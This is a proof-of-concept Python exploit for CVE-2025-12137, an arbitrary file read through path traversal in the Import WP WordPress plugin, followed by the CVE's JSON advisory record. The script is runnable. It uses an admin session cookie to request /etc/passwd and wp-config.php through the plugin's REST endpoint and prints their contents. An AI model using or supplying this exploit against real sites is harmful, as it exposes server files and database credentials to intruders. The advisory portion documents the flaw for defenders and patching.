CVE-2025-12137

import requests import sys # CVE-2025-12137 PoC - WordPress Import WP Arbitrary File Read # Target: WordPress site with Import WP plugin <= 2.14.16 # Auth: Requires administrator-level access def exploit_cve_2025_12137(target_url, cookie): """ Exploit for CVE-2025-12137 Reads arbitrary files from the server via path traversal """ endpoint = f"{target_url}/wp-json/importwp/v1/file" # Target files to read target_files = [ "/etc/passwd", "/var/www/html/wp-config.php", "/etc/hostname", "/etc/hosts" ] headers = { "Content-Type": "application/json", "Cookie": cookie } for file_path in target_files: payload = { "action": "file_local", "local_url": file_path } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Successfully read: {file_path}") print(response.text[:500]) print("-" * 50) else: print(f"[-] Failed to read: {file_path} (Status: {response.status_code})") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <admin_cookie>") print("Example: python exploit.py http://target.com 'wordpress_logged_in_xxx=xxx'") sys.exit(1) exploit_cve_2025_12137(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2025-12137", "sourceIdentifier": "[email protected]", "published": "2025-11-01T07:15:35.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Import WP – Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.14.16. This is due to the plugin's REST API endpoint accepting arbitrary absolute file paths without proper validation in the 'attach_file()' function when handling 'file_local' actions. This makes it possible for authenticated attackers, with administrator-level access and above, to read arbitrary files on the server's filesystem, including sensitive configuration files and system files via the 'local_url' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/36.html", "source": "[email protected]"}, {"url": "https://github.com/importwp/importwp/commit/94cc524aa0c81be6463a9e8d154b00220e34709c", "source": "[email protected]"}, {"url": "https://owasp.org/www-community/attacks/Path_Traversal", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Filesystem/Filesystem.php#L212", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Filesystem/Filesystem.php#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Importer/ImporterManager.php#L435", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Rest/RestManager.php#L1079", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387749%40jc-importer&new=3387749%40jc-importer&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f10636ea-06aa-4186-a891-ed4bb0800c41?source=cve", "source": "[email protected]"}]}}